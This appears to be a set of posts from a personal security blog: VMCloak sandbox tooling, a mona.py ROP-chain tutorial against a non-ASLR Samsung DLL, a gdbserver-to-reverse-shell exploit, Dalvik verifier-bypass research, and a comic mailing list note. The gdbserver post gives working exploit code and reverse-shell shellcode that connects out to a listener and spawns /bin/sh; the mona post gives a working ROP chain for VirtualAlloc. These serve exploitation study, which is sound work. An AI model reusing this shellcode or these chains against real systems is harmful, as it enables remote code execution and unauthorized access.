VMCloak 0.2: Windows 7 Support

A couple of months ago I released the first version of
VMCloak; now it’s time for version 0.2. VMCloak is a tool for
automatically creating and configuring Virtual Machines for
Cuckoo Sandbox.

What’s new?

In this version of VMCloak we introduce the long-awaited Windows 7
support. This means VMCloak can now automatically create and configure
Windows 7 virtual machines for Cuckoo Sandbox.


Those who have used VMCloak in the past will see that creating Windows 7
virtual machines is now just as easy as creating Windows XP virtual machines.
Creating a Windows 7 virtual machine goes as follows:

# Install the latest vmcloak.
sudo pip install vmcloak --upgrade

# Mount the Windows 7 Installer ISO.
sudo mkdir -p /mnt/win7
sudo mount -o loop,ro win7.iso /mnt/win7

# Ensure VirtualBox' hostonly adapter is up.

# Create a Win7 VM with the name win7vm.
# This will take about 15 to 20 minutes.
vmcloak -r --win7x64 win7vm

Besides a couple of internal changes, the only thing that changed for Windows
XP support is that you’ll now have to specify --winxp when creating a
Windows XP virtual machine, for example:

vmcloak -r --winxp winxp0 --serial-key AAAAA..EEEEE

32-bit vs 64-bit

With Windows 7 in mind, it makes sense that VMCloak now supports both 32-bit
and 64-bit Windows 7 installations. This mostly means that VMCloak will
install a 64-bit version of the .NET framework, the 64-bit version of the
Microsoft C Runtime, etc.
For this to work, however, you’ll have to inform VMCloak that the 64-bit
libraries should be used instead of the 32-bit ones. This can be achieved
either by passing the --x64 flag to vmcloak, or by combining the --win7 and
--x64 flags into the single --win7x64 flag.

(The upcoming version of Cuckoo Sandbox, version 1.3, will support
64-bit analysis!)

VMCloak Birds

Those who want to deploy multiple virtual machines in a relatively short
time window while preserving as many resources as possible might like
VMCloak’s bird feature.
VirtualBox has immutable disks, disks that are created once and then never
changed; any changes on top of the immutable disk are then written to a new
VirtualBox disk. VMCloak uses this to create a bird image – a fully
installed and configured Windows installation. Creating a Virtual Machine
ready to be used by Cuckoo Sandbox out of this bird image then consists of a
couple of steps:

  • Create a new Virtual Machine.
  • Attach the immutable bird image.
  • Boot into Windows.
  • Configure a unique static IP address for this VM.
  • Run Cuckoo and take a snapshot of the VM.

Naturally all these steps are handled by vmcloak-clone.
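To make the clone steps above a bit more concrete, here is a minimal Python sketch of the host-side part, expressed as VBoxManage invocations. It is an illustration under assumptions, not how vmcloak-clone is actually implemented: the helper name clone_commands, the storage controller name "IDE" and the snapshot name "vmcloak" are hypothetical, and the in-guest steps (static IP, starting the Cuckoo agent) only appear as a comment.

```python
def clone_commands(vm_name, bird_disk):
    """Return VBoxManage argv lists for the host-side clone steps.

    Hypothetical helper: a sketch of the steps, not vmcloak-clone's code.
    """
    return [
        # 1. Create and register a new, empty VM.
        ["VBoxManage", "createvm", "--name", vm_name, "--register"],
        # 2. Add a controller and attach the bird image as an immutable disk,
        #    so this VM's writes go to its own differencing disk.
        ["VBoxManage", "storagectl", vm_name, "--name", "IDE", "--add", "ide"],
        ["VBoxManage", "storageattach", vm_name, "--storagectl", "IDE",
         "--port", "0", "--device", "0", "--type", "hdd",
         "--medium", bird_disk, "--mtype", "immutable"],
        # 3. Boot into Windows without a GUI.
        ["VBoxManage", "startvm", vm_name, "--type", "headless"],
        # 4. (Inside the guest: configure a static IP, start the Cuckoo agent.)
        # 5. Take the live snapshot that Cuckoo restores before each analysis.
        ["VBoxManage", "snapshot", vm_name, "take", "vmcloak", "--live"],
    ]
```

Each argv list could then be executed with subprocess.check_call(argv). Attaching the bird with --mtype immutable is what lets many clones share one installation while each keeps its own changes.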

Bird images are crucial when running a Cuckoo Sandbox instance with more
than a handful of VMs on one machine. Whereas creating a new VM with Windows 7
installed, such as a bird image, takes about 15 minutes and almost
10 GB of disk space, creating a clone of a bird image takes less than a minute
and less than 1 GB per clone.
Note that you’ll still need the bird image, even after cloning! (Basically,
instead of installing Windows 7 ten times for 10 VMs, the bird image allows you
to install Windows 7 once and then re-use this installation.)
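The savings add up quickly. A back-of-the-envelope sketch using the rough figures quoted above (15 minutes and about 10 GB per full install; under a minute and under 1 GB per clone, rounded up to 1 here), with a hypothetical helper name:

```python
def clone_savings(n_vms, install_min=15, install_gb=10, clone_min=1, clone_gb=1):
    """Rough upper bounds (minutes, GB): n full installs vs. one bird + n clones."""
    full = (n_vms * install_min, n_vms * install_gb)
    bird = (install_min + n_vms * clone_min, install_gb + n_vms * clone_gb)
    return full, bird


full, bird = clone_savings(10)
print("full installs:", full, "bird + clones:", bird)
```

For 10 VMs that is roughly 150 minutes and 100 GB versus at most about 25 minutes and 20 GB.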

Following is a quick guide to setting up 10 VMs using a VMCloak bird. Running
these commands should take up to half an hour to finish – just enough to go
for lunch.

# Create the 64-bit Windows 7 Bird.
vmcloak -r --win7x64 --bird win7bird

# Create 10 VMs.
for i in {0..9}; do
    vmcloak-clone -r --bird win7bird win7_$i
done

What’s next?

As always, further cloaking the VMs is on the roadmap. If anyone has tricks &
tips on known detection vectors that would be useful for VMCloak, please do
let me know, e.g., registry keys containing values specific to
virtualization software.

Other than that, I’ve been working hard on 64-bit analysis for Cuckoo Sandbox
for a while now, so there’s that ;) And a bunch of other new and upcoming
features in Cuckoo.


For any questions or suggestions, please feel free to
reach out to me.

VMCloak: Automated Virtual Machine Generation and Cloaking for Cuckoo Sandbox

Today I present to you a tool that I’ve been working on for a while,
VMCloak. Those of you familiar with Cuckoo Sandbox and setting it up will
surely be aware of the pain that is configuring virtual machines.

VMCloak 101

Somewhat complete documentation can be found at readthedocs.org;
however, a quick introduction to the related commands is of course the
easiest. (Do note that VMCloak has mostly been tested on Ubuntu/Debian, so
other distributions might not work yet.)

Basically you need a few things to get started:

  • vmcloak (sudo pip install vmcloak)
  • Windows XP Installer ISO file
  • Windows XP Serial Key (that works with your installer!)
  • genisoimage & VirtualBox (sudo apt-get install genisoimage virtualbox)
  • Two directories for VirtualBox files.

First we have to mount the Windows installer ISO file:

sudo mkdir -p /mnt/winxp
sudo mount -o loop,ro /path/to/your/winxp.iso /mnt/winxp

Now we have to start vboxnet0 if it has not already been started:

# If this returns nothing, then vboxnet0 hasn't
# been started.
VBoxManage list hostonlyifs

# Create vboxnet0 and assign the correct IP address.
VBoxManage hostonlyif create
VBoxManage hostonlyif ipconfig vboxnet0 --ip
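If you want to script the "has vboxnet0 been started?" check, a small Python sketch could parse the output of VBoxManage list hostonlyifs. It assumes the usual "Key: value" layout of that output, where each interface block begins with a Name: line; the function names are hypothetical.

```python
import subprocess


def hostonly_interfaces(output):
    """Return the interface names listed in `VBoxManage list hostonlyifs` output."""
    names = []
    for line in output.splitlines():
        key, _, value = line.partition(":")
        # Only "Name:" lines carry the interface name; keys such as
        # "VBoxNetworkName:" merely contain it in their value.
        if key.strip() == "Name":
            names.append(value.strip())
    return names


def vboxnet0_exists():
    """Ask VBoxManage (assumed to be on PATH) whether vboxnet0 exists."""
    out = subprocess.check_output(["VBoxManage", "list", "hostonlyifs"], text=True)
    return "vboxnet0" in hostonly_interfaces(out)
```

If vboxnet0_exists() returns False, the two hostonlyif commands above still need to be run.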

And then two directories are required: a directory where VirtualBox’ snapshot
files will be stored, and a directory where the VirtualBox hard disk files and
installer ISO files will be stored. Note that you might want to place the
snapshot files in a tmpfs container to ensure VMs load pretty much instantly.

mkdir ~/vms/ ~/vm-data/

Having set up the mount directory, the hostonly interface, and the VirtualBox
directories, we’re now good to go with regard to creating our first VM with
VMCloak. It is advisable to use the recommended settings by providing
the -r switch. By default the hostonly IP address will be set to, however, if you intend to create multiple VMs then you’ll have
to give each VM a unique IP address (i.e.,,,
etc.) In order to automatically register the newly created VM with Cuckoo
you’ll have to set the cuckoo directory so we’ll do this as well.

We’re now going to make a VM with the name cuckoo1 and the IP address

vmcloak -r -d --vm-dir ~/vms/ --data-dir ~/vm-data/ \
    --iso-mount /mnt/winxp --serial-key AAAAA...EEEEE \
    --hostonly-ip --cuckoo ~/cuckoo/ \
    cuckoo1

The -d switch causes vmcloak to spit out debugging messages, which may be
helpful in some cases. This command will take up to 30 minutes to finish;
on the machines I’ve tested it on, it usually takes roughly 10 minutes or less.

So.. get yourself something to drink, wait for a bit, and you should have a
VM ready to be used by Cuckoo.

Allowing VMs full internet access

It is possible to give VMs full internet access, even after
creating them, without modifying the VMs themselves. If your network
configuration is “regular” (i.e., a working internet connection at either
eth0 or wlan0) then you’ll only have to run one command:

sudo vmcloak-iptables


Of course this is a never-ending project and it’s still actively being
developed ;) Things on the TODO list include, but are not limited to:

  • Windows 7 support
  • Further VM cloaking (making the VM as stealthy as possible)
  • VMware Workstation support
  • Support for installing Adobe / Microsoft Office / etc in the VM
  • Loads more..


Of course there’s an official website and naturally the source code
can be found on GitHub.


Further credits go to Thorsten Sick of Avira and a special thanks to
Avira and the iTES Project for supporting the development of
this tool.

So much for today! Hope the tool will be useful for people and if there are
any questions don’t hesitate to email me or so.

ps: Please don’t tell me about using vagrant or similar instead of
something custom built unless you’ve actually used it together with Cuckoo :P

Mona 101: a Global Samsung DLL

This blogpost will be just another 101 for mona.py. There’s already a
good introduction to / full documentation of mona here, including
setting it up and running it for the first time. (Which is surprisingly easy,
at least with Immunity Debugger – I haven’t tested mona with WinDBG.)

Our target

Well, it turns out that a dll called WinCRT.dll, developed by Samsung and
distributed by default on at least a set of Samsung laptops, is
being loaded in every process that imports user32.dll on my system.. Yay!
Needless to say it doesn’t have ASLR enabled, nor does it rebase by default.
If you haven’t guessed its base address by now, then I’ll give you a hint;
0x10000000. A copy of the DLL can be found here – naturally I’m not
responsible for whatever you do with it :p

Btw, the path of this Samsung DLL is:
C:\Program Files (x86)\Samsung\Movie Color Enhancer\WinCRT.dll

Generate some ROP

After running any program which imports user32, such as the following
MessageBox() program, we attach Immunity Debugger to it.

#include <windows.h>

int main(void)
{
    MessageBoxA(NULL, "Hello Samsung!", ":-)", 0);
    return 0;
}

We run the following command and get our ROP chain after roughly 10 seconds:

!mona rop -m wincrt -rva

As documented in the tutorials that were linked earlier in this blogpost, the
-m switch specifies the module to search, and -rva gives a dump with
relative addresses to the base address. (In case you need an infoleak to
obtain the base address of your target module, rather than having a DLL that’s
being loaded on a static address.)
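For the infoleak case, recovering the base is a single subtraction before calling create_rop_chain(). The sketch below assumes a hypothetical leak of the address of WinCRT.dll’s IAT slot for VirtualAlloc (RVA 0x1f0a8 in the chain below); module_base is a hypothetical helper. It also checks 64 KB alignment, since Windows maps PE images at 64 KB-aligned bases.

```python
def module_base(leaked_ptr, known_rva):
    """Recover a module's base address from a leaked pointer at a known RVA."""
    base = leaked_ptr - known_rva
    # PE images are mapped on 64 KB boundaries, so a misaligned result
    # means the RVA (or the leak itself) is wrong.
    if base % 0x10000:
        raise ValueError("base 0x%08x is not 64 KB aligned" % base)
    return base


# Hypothetical leak: address of the IAT entry for VirtualAlloc (RVA 0x1f0a8).
base_wincrt = module_base(0x1001f0a8, 0x1f0a8)
print(hex(base_wincrt))
```

With the DLL at its static address the leak is unnecessary, which is exactly what makes this Samsung DLL so convenient.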

The ROP chain returned may look like the following, including some comments
about what the registers should look like at the point that VirtualAlloc is
called:
Register setup for VirtualAlloc() :
 EAX = NOP (0x90909090)
 ECX = flProtect (0x40)
 EDX = flAllocationType (0x1000)
 EBX = dwSize
 ESP = lpAddress (automatic)
 EBP = ReturnTo (ptr to jmp esp)
 ESI = ptr to VirtualAlloc()

import struct

def create_rop_chain(base_wincrt):
    # rop chain generated with mona.py
    rop_gadgets = [
        base_wincrt + 0x0000f128,  # POP EAX # POP EBP # RETN [WinCRT.dll]
        base_wincrt + 0x0001f0a8,  # ptr to &VirtualAlloc() [IAT WinCRT.dll]
        0x41414141,                # Filler (compensate)
        base_wincrt + 0x00005bff,  # MOV EAX,DWORD PTR DS:[EAX] # ADD CL,CL # RETN 0x08 [WinCRT.dll]
        base_wincrt + 0x0000431d,  # PUSH EAX # ADD AL,5F # POP ESI # RETN [WinCRT.dll]
        0x41414141,                # Filler (RETN offset compensation)
        0x41414141,                # Filler (RETN offset compensation)
        base_wincrt + 0x0001a14e,  # POP EBP # RETN [WinCRT.dll]
        0x00000000,                # &  []
        base_wincrt + 0x0000bd5b,  # POP EBX # RETN [WinCRT.dll]
        0x00000001,                # 0x00000001-> ebx
        base_wincrt + 0x00005209,  # POP EBX # RETN [WinCRT.dll]
        0x00001000,                # 0x00001000-> edx
        base_wincrt + 0x0001183c,  # XOR EDX,EDX # RETN [WinCRT.dll]
        base_wincrt + 0x0001175e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [WinCRT.dll]
        0x41414141,                # Filler (compensate)
        base_wincrt + 0x000191b8,  # POP ECX # RETN [WinCRT.dll]
        0x41414141,                # Filler (RETN offset compensation)
        0x41414141,                # Filler (RETN offset compensation)
        0x41414141,                # Filler (RETN offset compensation)
        0x41414141,                # Filler (RETN offset compensation)
        0x00000040,                # 0x00000040-> ecx
        base_wincrt + 0x0000f203,  # POP EDI # RETN [WinCRT.dll]
        base_wincrt + 0x0000f204,  # RETN (ROP NOP) [WinCRT.dll]
        base_wincrt + 0x0000f128,  # POP EAX # POP EBP # RETN [WinCRT.dll]
        0x90909090,                # nop
        0x41414141,                # Filler (compensate)
        base_wincrt + 0x0000c27e,  # PUSHAD # ADD AL,0 # RETN [WinCRT.dll]
    ]
    return b''.join(struct.pack('<I', _) for _ in rop_gadgets)

# [WinCRT.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: False, v0.0.0.1 (C:\Program Files (x86)\Samsung\Movie Color Enhancer\WinCRT.dll)
base_wincrt = 0x10000000
rop_chain = create_rop_chain(base_wincrt)

Fixing the ROP chain

Unfortunately mona makes some small mistakes, but it also gives great
feedback in the form of rop.txt and rop_suggestions.txt.

Now if you look closely at the generated ROP chain, while comparing it to
the notes about the required states of the registers for VirtualAlloc,
you’ll notice that some gadgets have to be shuffled around, and some are not
correct yet.

Let’s analyze each register top-to-bottom from the provided register list in
order to see if they’re all set correctly. First we start with eax.

Eax is set to 0x90909090 at the end. However, the gadget doing so also sets ebp
to an invalid value; register dependencies are something that mona doesn’t
handle very well yet, unfortunately. Anyway, it’s easier to replace this gadget
than to shuffle it around. I ended up replacing it with a “pop ecx ; retn” and
a “mov eax, ecx ; retn” gadget, and moving them to an earlier place in the ROP
chain where ecx has
not yet been assigned its final value. Ecx itself is already correct; it’ll be
set to 0x40 using the ‘original’ “pop ecx ; retn” gadget.

Edx has to become 0x1000, for which mona has decided to use ebx as an
intermediate register. We can remove the first gadget that sets ebx, as its
value is overwritten right away when executing the next gadget. (Which sets
ebx as well.)
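To double-check that dropping the first “pop ebx” gadget is harmless, one can model just the gadgets that determine edx as functions on a register dictionary. This is a deliberately simplified Python sketch: it tracks only ebx and edx, the helper names are hypothetical, and it ignores the POP EBX / RETN 0x10 tail of the real ADD EDX,EBX gadget.

```python
MASK32 = 0xFFFFFFFF


def pop_ebx(regs, stack):
    regs["ebx"] = stack.pop(0)          # POP EBX # RETN


def xor_edx_edx(regs, stack):
    regs["edx"] = 0                     # XOR EDX,EDX # RETN


def add_edx_ebx(regs, stack):
    # ADD EDX,EBX (the real gadget's POP EBX / RETN 0x10 is not modelled)
    regs["edx"] = (regs["edx"] + regs["ebx"]) & MASK32


def run(gadgets, stack_values):
    """Apply each gadget in order, starting from junk register values."""
    regs = {"ebx": 0x41414141, "edx": 0x41414141}
    stack = list(stack_values)
    for gadget in gadgets:
        gadget(regs, stack)
    return regs


as_generated = run([pop_ebx, pop_ebx, xor_edx_edx, add_edx_ebx], [0x1, 0x1000])
without_first = run([pop_ebx, xor_edx_edx, add_edx_ebx], [0x1000])
print(hex(as_generated["edx"]), hex(without_first["edx"]))
```

Both runs end with edx = 0x1000, because the second POP EBX overwrites whatever the first one loaded.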

Now mona handles esp for us, so we don’t have to do anything there. The next
register, ebp, however, does need some extra work. The description tells us
it needs to point to a “jmp esp” gadget, but because there’s no such gadget in
our DLL mona sort of failed silently. (The comment doesn’t show an error
message, but instead shows something that doesn’t make much sense.)

Given there’s no “jmp esp” in our code, nor a direct “push esp ; retn” gadget,
we have to play around with mona some more.. We run the following command
which is, again, documented here, and find the following gadget.

!mona findwild -s "push esp#*#retn" -m wincrt

0x10009558: push esp # add al,2 # adc bl,al # xor eax,eax # retn [WinCRT.dll]

Finishing up

So yeah, that’ll do for us :) Patch the 0x00000000 value with
“base_wincrt + 0x00009558” and ebp is good to go. Finally, esi and edi
have been handled correctly by mona. (Note that we don’t have to worry about
the value of eax in our custom “jmp esp” gadget, as this is executed right
after the call to VirtualAlloc, and literally jumps to our shellcode.)
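Inside create_rop_chain(), the ebp fix amounts to replacing the single 0x00000000 placeholder in rop_gadgets before it is packed. A small Python sketch of that step with a hypothetical helper; it refuses to patch if the placeholder is not unique, so a legitimate zero elsewhere in a chain could not be overwritten by accident.

```python
def patch_placeholder(gadgets, placeholder, value):
    """Return a copy of gadgets with its single placeholder entry replaced."""
    if gadgets.count(placeholder) != 1:
        raise ValueError("placeholder must occur exactly once")
    patched = list(gadgets)
    patched[patched.index(placeholder)] = value
    return patched


base_wincrt = 0x10000000
# Excerpt around the broken entry: POP EBP # RETN, then the bogus "jmp esp" value.
excerpt = [base_wincrt + 0x0001a14e, 0x00000000, base_wincrt + 0x0000bd5b]
fixed = patch_placeholder(excerpt, 0x00000000, base_wincrt + 0x00009558)
print([hex(g) for g in fixed])
```

In the full chain, rop_gadgets = patch_placeholder(rop_gadgets, 0x00000000, base_wincrt + 0x00009558) would go right before the return statement.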

Having fixed the ROP chain, our final ROP chain including some MessageBox()
shellcode, wrapped into a C file, looks like the following. (Woah,
somebody added C dumping support to mona yesterday!) In case you’re interested
in the binary, to be run when the DLL is loaded into memory, it can be found
here.

This was the first time I tried mona and I’m genuinely happy about it. Very
easy to use and it did the job for me :) Ah yeah, so anyone with this
particular Samsung software on his computer.. how do I even.. I guess it’s
just “another one of those”.

Turning arbitrary GDBserver sessions into RCE

Today we’ll see how we can turn an arbitrary GDBserver remote debugging
session into remote code execution. First of all, let’s assume gdbserver is
run using the following command. We will also assume that the target
architecture is Linux/x86, but you can port the technique to other
architectures as needed.

$ gdbserver --remote-debug ./some_unknown_binary

What happens is that gdbserver will serve as many remote debugging sessions as
possible while it’s running. That is, we can have as many remote debugging
sessions as we like, until the gdbserver is killed (but only one at a time.)
This makes sense, because if we are debugging a target, then we don’t want to
restart gdbserver every time we hit “run” in gdb.

Let’s assume one were to run gdbserver in a screen, to prevent accidental
connection resets resulting in losing the gdbserver session (assuming we’re
ssh’ing into a remote server.) Exactly this happened to me – I recently found
out that there were still two (of my) gdbservers running in a screen from
when we were playing a CTF, almost two months ago.

Now anyone with the ip address and port number can attach to your gdbserver by
doing the following.

$ gdb
(gdb) target extended-remote host:port
Remote debugging using host:port
(gdb) run
[Inferior 1 (process 42) exited normally]

In order not to make the RCE too easy, we’re going to assume that we don’t
have any symbols of the remote binaries, and that all addresses are ASLR’d. In
other words, educated guessing of “main” is useless, and we won’t be able
to do arbitrary function calls during debugging such as the following.

(gdb) call system("/bin/sh")
No symbol table is loaded.  Use the "file" command.

However, if we set a breakpoint at an invalid address and run the debuggee,
we get an error right before executing the very first instruction of the
process. This looks roughly like the following :)

(gdb) break *0
Breakpoint 1 at 0x0
(gdb) run
Starting program:
warning: Could not load vsyscall page because no executable was specified
try using the "file" command first.
Cannot insert breakpoint 1.
Error accessing memory address 0x0: Unknown error 18446744073709551615.
(gdb) info reg eip
eip            0xf7fe0850       0xf7fe0850

At this point the debuggee has been started, and we’re able to inspect and
modify its state. We continue by removing our earlier breakpoint. Now it’s
time for the fun part.

Reverse Shell Shellcode

After a bit of googling, I stumbled upon the following shellcode. This
shellcode connects to an ip address and port of your choosing, and executes
/bin/sh with stdin, stdout, and stderr set to your socket. If we have netcat
listening on the remote ip address and port, then it’ll get a connection
request upon execution of the shellcode, and we can use it to run arbitrary
shell commands on the machine running the shellcode, as if we had shell access. After an
initial test, this shellcode seemed to work on my x86_64 machine running a
32-bit application. However, there’s a small problem with this shellcode. If
we look closely at the shellcode, we notice the following.

804807b:   31 db        xor    ebx,ebx
804807d:   b3 02        mov    bl,0x2
804808a:   fe c3        inc    bl
8048098:   b1 03        mov    cl,0x3
804809a <dupfd>:
804809a:   fe c9        dec    cl
804809c:   b0 3f        mov    al,0x3f
804809e:   cd 80        int    0x80      ; system call
80480a0:   75 f8        jne    804809a

Investigating this system call further, we see that this is the dup2
system call (0x3f). However, the ebx register, or old_fd, seems to be
constant here, namely three. (I figured this out while brushing my teeth..)
This is the fd a program typically gets for the first file it opens after
stdin, stdout, and stderr, which is something we cannot assume, and is
definitely not the case when running the debuggee under gdbserver. (E.g., this
shellcode fails if you open a file or socket before running it, because the fd
of the socket allocated by our shellcode will be four for example, instead of
three.)
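A quick way to convince yourself that the socket’s fd cannot be hardcoded: POSIX hands out the lowest-numbered unused descriptor, so anything opened earlier pushes the socket’s number up. A minimal Python sketch (the helper name is hypothetical):

```python
import os
import socket


def socket_fd_after_opening(n_files):
    """Open n_files descriptors, then a socket; return (file_fds, socket_fd)."""
    fds = [os.open(os.devnull, os.O_RDONLY) for _ in range(n_files)]
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # The return value is computed before the cleanup below runs.
        return fds, sock.fileno()
    finally:
        sock.close()
        for fd in fds:
            os.close(fd)


fds, sock_fd = socket_fd_after_opening(2)
print("files:", fds, "socket:", sock_fd)
```

The socket always ends up above every descriptor that was already open, which is why the shellcode has to use the value socket() actually returned.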

If we look further, we see that the esi register contains the fd number
returned from the socket system call. (Actually, this is the socketcall
system call with SOCKOP_socket as operation, but that’s a minor detail
specific to Linux/x86.)

8048075:   cd 80        int    0x80      ; socket()
8048077:   89 c6        mov    esi,eax   ; esi = fd
804808e:   6a 10        push   0x10      ; sizeof(sockaddr_in)
8048090:   51           push   ecx       ; sockaddr_in *
8048091:   56           push   esi       ; fd
8048092:   89 e1        mov    ecx,esp
8048094:   cd 80        int    0x80      ; connect()

Long story short, we want to preserve esi before the connect system call,
and store it into ebx after the system call. Thus ebx will contain the fd of
our socket, and the system calls to dup2 will duplicate the correct fd into
stdin, stdout, and stderr. The following snippet shows the updated shellcode,
which is the shellcode that we’re going to use.

8048092:   89 e1        mov    ecx,esp
+                       push   esi       ; push fd
8048094:   cd 80        int    0x80      ; connect()
+                       pop    ebx       ; pop fd into ebx
8048096:   31 c9        xor    ecx,ecx
8048098:   b1 03        mov    cl,0x3
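In raw bytes the change is tiny: a push esi (0x56) before the connect() int 0x80 and a pop ebx (0x5b) right after it. A minimal Python sketch of that byte patch, anchored on the unique mov ecx,esp / int 0x80 / xor ecx,ecx sequence of the connect() call; the helper name is hypothetical. Inserting bytes is only safe if no relative jump crosses the insertion point, which holds for the listing above (the only jump, jne dupfd, lies entirely after it).

```python
# mov ecx,esp ; int 0x80 ; xor ecx,ecx   (the connect() call site)
ORIGINAL = bytes.fromhex("89e1" "cd80" "31c9")
# mov ecx,esp ; push esi ; int 0x80 ; pop ebx ; xor ecx,ecx
PATCHED = bytes.fromhex("89e1" "56" "cd80" "5b" "31c9")


def patch_connect(shellcode):
    """Preserve the socket fd across connect() and leave it in ebx for dup2."""
    if shellcode.count(ORIGINAL) != 1:
        raise ValueError("expected exactly one connect() call site")
    return shellcode.replace(ORIGINAL, PATCHED)


# Fragment from push 0x10 up to mov cl,0x3 in the listing above.
fragment = bytes.fromhex("6a10515689e1cd8031c9b103")
print(patch_connect(fragment).hex())
```

The output matches the corresponding part of the hex string used in the exploit code.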

Running the Shellcode

All we have left to do is to patch the correct ip address and port into the
shellcode, namely that of our listening netcat instance (e.g., running
“nc -vvv -l 9001” on your favourite linux box), write the shellcode to the
memory that eip points to, and finally, run it.

For my exploit I’m using gdb’s Python bindings, as initially I had another
technique in mind, which required a bit more scripting. Following is the
final part of the code which generates the shellcode, writes it to the memory at eip,
and executes it. We have two continue statements at the end, as the
shellcode will execv into /bin/sh, after which we’ll get an error that
gdbserver can’t read the memory of eip anymore, so we have to instruct
gdbserver to continue past that error.

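import socket
import struct
import gdb  # provided by gdb when the script is run via "gdb -x"

def reverse_shell(addr):
    """Modified x86 reverse shell; addr is an (ip, port) tuple."""
    ip, port = socket.inet_aton(addr[0]), struct.pack('>H', addr[1])
    sc = bytes.fromhex(
        '31c031db31c931d2b066b301516a066a016a0289e1cd8089c6b06631dbb30268'
        '000000006668ffff6653fec389e16a10515689e156cd805b31c9b103fec9b03f'
        # ... remaining shellcode bytes (not included in this excerpt)
    )
    # Patch in the port (placeholder ffff) and ip (placeholder 00000000).
    return sc.replace(b'\xff' * 2, port).replace(b'\x00' * 4, ip)

# netcat is the (ip, port) tuple of the listening nc instance.
for idx, ch in enumerate(reverse_shell(netcat)):
    gdb.execute('set *(unsigned char *)($eip + %d) = %d' % (idx, ch))

# Run the shellcode; the second continue gets past the error after execve.
gdb.execute('continue')
gdb.execute('continue')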

Final Exploit

The final exploit code can be found here.

Execution of the code may look like the following. We’ll need three shells.
(Optionally on different servers – do as you like.)

Shell 1

$ gdbserver --remote-debug ./some_unknown_binary

Shell 2

$ nc -vvv -l 31338

Shell 3

$ vim gdbservrce.py   # Patch the ip addresses
$ gdb -x gdbservrce.py

Enjoy Shell!

Now if we go back to Shell #2, we’ll see the following, and can run arbitrary
shell commands.

skier@box:~$ nc -vvv -l 31338
Connection from port 31338 [tcp/*] accepted
uid=1010(skier) gid=1011(skier) groups=1011(skier)


This is a funny technique which basically tells you not to leave gdbservers
running around :)

Dalvik Research

Over the past couple of months I’ve been doing some research with regards to
the Dalvik Virtual Machine, which is Android’s Java Virtual Machine
implementation. Long story short, most Android applications are written in
Java, which gets compiled to Dalvik Bytecode, and ends up in an APK file (a
Zip file.)

As part of my research on Dalvik, I analyzed both the Dalvik VM itself and
various applications, with a focus on their obfuscation techniques (which
make analysis harder). This research was presented at a couple of conferences.

Back in June I already posted my slides for my AthCon
talk, which focussed on Deobfuscation. Then a couple of weeks ago,
I did a similar talk together with Rodrigo Chiossi at
H2HC, featuring new and updated content, with a bit more focus on some
of the techniques involved in creating new Dex files.

Finally I did a talk yesterday at Hack.lu, focussing on the
Dalvik Virtual Machine itself. In this talk I presented an
“undocumented feature” which I found in the way Android verifies Dex files,
allowing an attacker to run arbitrary Dalvik Bytecode (which is normally not
allowed – all code must normally be hardcoded and will be verified upon
installation.) Following are the slides and the
Proof of Concept DvmEscape application.

As explained during the presentation, when running this application on your
phone or emulator, you can type arbitrary Dalvik Bytecode and execute it by
clicking on the “Run Dalvik” button. On the 30th slide of the presentation one
can find two examples of valid Dalvik Bytecode, which, when run, will return
with a fancy number. Unfortunately the dalvik.py disassembler mentioned in the
slides is currently not open source, but for some more documentation on the
Dalvik Bytecode there’s always the Dalvik Bytecode reference.
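To give an idea of what such bytecode looks like, here is a small Python sketch that encodes two instructions from the Dalvik Bytecode reference: const/4 (opcode 0x12, format 11n) and return (opcode 0x0f, format 11x). These are not the examples from the slides, and the exact input format DvmEscape expects is an assumption here (hex of the little-endian code units); the helper names are hypothetical.

```python
def const4(reg, value):
    """const/4 vA, #+B (format 11n): one 16-bit code unit laid out as B|A|0x12."""
    if not (0 <= reg <= 15 and -8 <= value <= 7):
        raise ValueError("const/4 takes v0-v15 and a signed 4-bit literal")
    return [((value & 0xF) << 12) | (reg << 8) | 0x12]


def return_reg(reg):
    """return vAA (format 11x): one 16-bit code unit laid out as AA|0x0f."""
    if not 0 <= reg <= 255:
        raise ValueError("return takes v0-v255")
    return [(reg << 8) | 0x0F]


def to_hex(code_units):
    """Serialize 16-bit code units little-endian, as they appear in a dex file."""
    return b"".join(u.to_bytes(2, "little") for u in code_units).hex()


# const/4 v0, #5 ; return v0
print(to_hex(const4(0, 5) + return_reg(0)))
```

This prints 12500f00: a method body that returns the number 5.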

Win32 Calc.exe Proof of Concept

If you want to run my win32 calc.exe Proof of Concept from the presentation
you’ll have to do a couple of things:

  • Install CalcExe.apk on the device
  • Get the adb_type.py script, which “types” a string into
    the emulator
  • Finally, type payload.txt into the DvmEscape application, with
    the following command.

$ python adb_type.py $(cat payload.txt)

Note that typing the bytecode into the emulator (or phone?!) takes roughly a
minute. (No, there appears to be no support for using the clipboard with the
emulator.) After that, just click on the button and calc should pop :)
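For those curious how “typing” into the emulator can work at all, here is a hedged Python sketch built on adb shell input text. This is not the adb_type.py script from above; the chunk size and the helper names are assumptions. It relies on input text’s convention of writing a space as %s, and assumes the payload contains no other shell metacharacters (a hex payload does not).

```python
import subprocess


def adb_type_commands(text, chunk_size=64):
    """Split text into `adb shell input text` invocations (hypothetical helper)."""
    cmds = []
    for i in range(0, len(text), chunk_size):
        # `input text` interprets %s as a space character.
        chunk = text[i:i + chunk_size].replace(" ", "%s")
        cmds.append(["adb", "shell", "input", "text", chunk])
    return cmds


def adb_type(text):
    """Send each chunk to the connected device or emulator, in order."""
    for argv in adb_type_commands(text):
        subprocess.check_call(argv)
```

Sending the payload in chunks keeps each adb invocation short; it is also part of why typing a long payload this way is slow.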

For more information or questions, feel free to reach me at my new email
address; mail.

Dirkjan Email Feed

This blogpost is mainly for Dutch (speaking) people (although I’ll
still keep the blogpost in English.) As I’m sure you’re all well aware,
Dirkjan is an awesome Dutch comic.

A couple of weeks ago I stumbled upon the weekly feed from Veronica.
Naturally, not wanting to check the website every week, I came up with a very
simple Dirkjan Feed in the shape of a Mailing List. Of course this is not
so much a mailing list, as it’s mostly one-way traffic, but it’s a fun way to
keep up-to-date with two Dirkjans a week!


Having said that, one can subscribe here simply by filling out
the email address. Other information is optional and not very interesting.
(Yes, the website is a bit ugly – it’s the default mailing list manager.)

By subscribing you agree to being awesome (given you’re interested in reading
Dirkjan) and the legal disclaimer on the bottom of this blogpost.


As I’ve only just set up the mailing list, I do not know exactly when new
comics will arrive, but it looks like it will be every Tuesday. Please do not
panic if a comic is late; the comics will come eventually!

Legal stuff

I’m not affiliated with Veronica in any way. Any damage done through this
